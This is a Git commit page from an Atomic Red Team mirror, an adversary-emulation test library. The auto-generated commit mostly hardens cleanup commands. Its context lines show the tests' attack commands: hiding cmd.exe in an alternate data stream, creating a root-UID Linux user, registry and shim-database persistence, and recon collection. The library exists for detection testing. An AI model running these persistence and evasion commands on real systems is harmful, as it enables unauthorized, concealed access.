security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-02-28 18:03:51 +00:00
parent ce43569dcf
commit 5e8e3e0851
8 changed files with 62 additions and 71 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1096/T1096.md
+5 -2
View File
@@ -62,17 +62,20 @@ Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
|------|-------------|------|---------------|
| payload_path | Path of file to hide in ADS | path | c:\windows\system32\cmd.exe|
| ads_file_path | Path of file to create an ADS under | path | C:\Users\Public\Libraries\yanki\desktop.ini|
| ads_name | Name of ADS | string | ADSName|
| ads_name | Name of ADS | string | desktop.ini|
#### Attack Commands: Run with `powershell`!
```
if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) {
New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
}
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
```
#### Cleanup Commands:
```
Remove-Item -Path "#{ads_file_path}" -Stream "#{ads_name}"
Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
```
atomics/T1102/T1102.md
+1 -1
View File
@@ -58,7 +58,7 @@ $T1102 = $wc.DownloadString("https://www.aol.com/")
#### Cleanup Commands:
```
Clear-Variable T1102
Clear-Variable T1102 >$null 2>&1
```
atomics/T1112/T1112.md
+3 -3
View File
@@ -196,7 +196,7 @@ Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_sto
#### Cleanup Commands:
```
Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore
```
@@ -227,7 +227,7 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
#### Cleanup Commands:
```
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
Remove-item $key -Recurse
Remove-item $key -Recurse -ErrorAction Ignore
```
@@ -251,7 +251,7 @@ New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Setti
#### Cleanup Commands:
```
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
```
atomics/T1119/T1119.md
+7 -7
View File
@@ -74,9 +74,9 @@ Get-Process > $env:TEMP\T1119_3.txt
#### Cleanup Commands:
```
Remove-Item $env:TEMP\T1119_1.txt
Remove-Item $env:TEMP\T1119_2.txt
Remove-Item $env:TEMP\T1119_3.txt
Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
```
@@ -103,10 +103,10 @@ tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
#### Cleanup Commands:
```
del %TEMP%\T1119_1.txt
del %TEMP%\T1119_2.txt
del %TEMP%\T1119_3.txt
del %TEMP%\T1119_4.txt
del %TEMP%\T1119_1.txt >$null 2>&1
del %TEMP%\T1119_2.txt >$null 2>&1
del %TEMP%\T1119_3.txt >$null 2>&1
del %TEMP%\T1119_4.txt >$null 2>&1
```
atomics/T1121/T1121.md
+2 -2
View File
@@ -68,8 +68,8 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
#### Cleanup Commands:
```
del #{file_name}
del key.snk
del #{file_name} >$null 2>&1
del key.snk >$null 2>&1
```
atomics/T1136/T1136.md
+1 -1
View File
@@ -140,7 +140,7 @@ New-LocalUser -Name "#{username}" -NoPassword
#### Cleanup Commands:
```
Remove-LocalUser -Name "#{username}"
Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
```
atomics/T1138/T1138.md
+4 -4
View File
@@ -70,8 +70,8 @@ Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\appp
#### Cleanup Commands:
```
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
```
@@ -96,8 +96,8 @@ New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCo
#### Cleanup Commands:
```
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
```
atomics/index.yaml
+39 -51
View File
@@ -645,8 +645,8 @@ persistence:
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
cleanup_command: |
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
- name: Registry key creation and/or modification events for SDB
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
@@ -660,8 +660,8 @@ persistence:
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
cleanup_command: |
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
T1197:
technique:
x_mitre_data_sources:
@@ -1202,7 +1202,7 @@ persistence:
command: 'New-LocalUser -Name "#{username}" -NoPassword
'
cleanup_command: 'Remove-LocalUser -Name "#{username}"
cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
'
- name: Create a new user in Linux with `root` UID and GID.
@@ -1227,9 +1227,7 @@ persistence:
command: |
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
cleanup_command: 'userdel #{username}
'
cleanup_command: 'userdel #{username}'
T1038:
technique:
x_mitre_permissions_required:
@@ -9597,8 +9595,8 @@ defense-evasion:
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
cleanup_command: 'Remove-ItemProperty -Force -Path -Path #{registry_key_storage}
-Name #{registry_entry_storage}
cleanup_command: 'Remove-ItemProperty -Force -Path #{registry_key_storage}
-Name #{registry_entry_storage} -ErrorAction Ignore
'
- name: Add domain to Trusted sites Zone
@@ -9619,7 +9617,7 @@ defense-evasion:
new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
cleanup_command: |
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
Remove-item $key -Recurse
Remove-item $key -Recurse -ErrorAction Ignore
- name: Javascript in registry
description: 'placing javascript in registry for persistence
@@ -9633,10 +9631,8 @@ defense-evasion:
Settings" -Name T1112 -Value "<script>"
'
cleanup_command: 'Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112
'
cleanup_command: Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -ErrorAction Ignore
T1170:
technique:
x_mitre_data_sources:
@@ -9920,21 +9916,17 @@ defense-evasion:
ads_name:
description: Name of ADS
type: string
default: ADSName
default: desktop.ini
executor:
name: powershell
elevation_required: false
prereq_command: |
if (!(Test-Path "#{ads_file_path}"))
{
$FileCreated = New-Item -Path "#{ads_file_path}" -Type "file" -Force
0
}
else {0}
command: 'Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
'
cleanup_command: Remove-Item -Path "#{ads_file_path}" -Stream "#{ads_name}"
prereq_command: ''
command: |
if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) {
New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
}
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
cleanup_command: Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
T1126:
technique:
x_mitre_data_sources:
@@ -10864,9 +10856,9 @@ defense-evasion:
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
cleanup_command: |
del #{file_name}
del key.snk
cleanup_command: |-
del #{file_name} >$null 2>&1
del key.snk >$null 2>&1
T1117:
technique:
x_mitre_data_sources:
@@ -12249,9 +12241,7 @@ defense-evasion:
$T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/")
$wc = New-Object System.Net.WebClient
$T1102 = $wc.DownloadString("https://www.aol.com/")
cleanup_command: 'Clear-Variable T1102
'
cleanup_command: Clear-Variable T1102 >$null 2>&1
T1220:
technique:
x_mitre_data_sources:
@@ -13014,8 +13004,8 @@ privilege-escalation:
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
cleanup_command: |
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
- name: Registry key creation and/or modification events for SDB
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
@@ -13029,8 +13019,8 @@ privilege-escalation:
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
cleanup_command: |
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
T1088:
technique:
x_mitre_data_sources:
@@ -22307,9 +22297,9 @@ execution:
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
cleanup_command: |
del #{file_name}
del key.snk
cleanup_command: |-
del #{file_name} >$null 2>&1
del key.snk >$null 2>&1
T1117:
technique:
x_mitre_data_sources:
@@ -25747,9 +25737,9 @@ collection:
Get-ChildItem Env: > $env:TEMP\T1119_2.txt
Get-Process > $env:TEMP\T1119_3.txt
cleanup_command: |
Remove-Item $env:TEMP\T1119_1.txt
Remove-Item $env:TEMP\T1119_2.txt
Remove-Item $env:TEMP\T1119_3.txt
Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
- name: Recon information for export with Command Prompt
description: 'collect information for exfiltration
@@ -25764,11 +25754,11 @@ collection:
doskey /history > %TEMP%\T1119_2.txt
wmic process list > %TEMP%\T1119_3.txt
tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
cleanup_command: |
del %TEMP%\T1119_1.txt
del %TEMP%\T1119_2.txt
del %TEMP%\T1119_3.txt
del %TEMP%\T1119_4.txt
cleanup_command: |-
del %TEMP%\T1119_1.txt >$null 2>&1
del %TEMP%\T1119_2.txt >$null 2>&1
del %TEMP%\T1119_3.txt >$null 2>&1
del %TEMP%\T1119_4.txt >$null 2>&1
T1115:
technique:
x_mitre_data_sources:
@@ -28245,9 +28235,7 @@ command-and-control:
$T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/")
$wc = New-Object System.Net.WebClient
$T1102 = $wc.DownloadString("https://www.aol.com/")
cleanup_command: 'Clear-Variable T1102
'
cleanup_command: Clear-Variable T1102 >$null 2>&1
initial-access:
'':
technique: